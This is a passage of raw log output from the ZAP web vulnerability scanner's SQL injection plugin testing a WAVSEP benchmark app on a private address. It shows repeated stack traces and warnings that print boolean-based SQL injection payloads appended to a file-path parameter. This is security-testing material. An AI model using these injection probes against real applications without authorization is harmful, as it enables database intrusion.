org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922309 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1166=8762 AND (1181=1181] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp) AND 1166=8762 AND (1181=1181 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922311 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9114=5770] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9114=5770 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922314 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3537=3537] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 3537=3537 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922315 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9114=5770] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 9114=5770 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922317 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7647=3165 AND ('LZTn'='LZTn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7647=3165 AND ('LZTn'='LZTn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922320 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 2326=2326 AND ('WVqF'='WVqF] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 2326=2326 AND ('WVqF'='WVqF at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922322 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7647=3165 AND ('LZTn'='LZTn] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp') AND 7647=3165 AND ('LZTn'='LZTn at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922324 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3079=7574 AND 'MYYk'='MYYk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3079=7574 AND 'MYYk'='MYYk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922325 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3271=3271 AND 'ituy'='ituy] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3271=3271 AND 'ituy'='ituy at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922327 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3079=7574 AND 'MYYk'='MYYk] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp' AND 3079=7574 AND 'MYYk'='MYYk at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922329 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9380=5543 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9380=5543 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922331 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5251=5251 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 5251=5251 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:720) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922332 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9380=5543 AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%' AND 9380=5543 AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:737) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922338 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2419=9826-- DuUq] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp AND 2419=9826-- DuUq at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:706) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 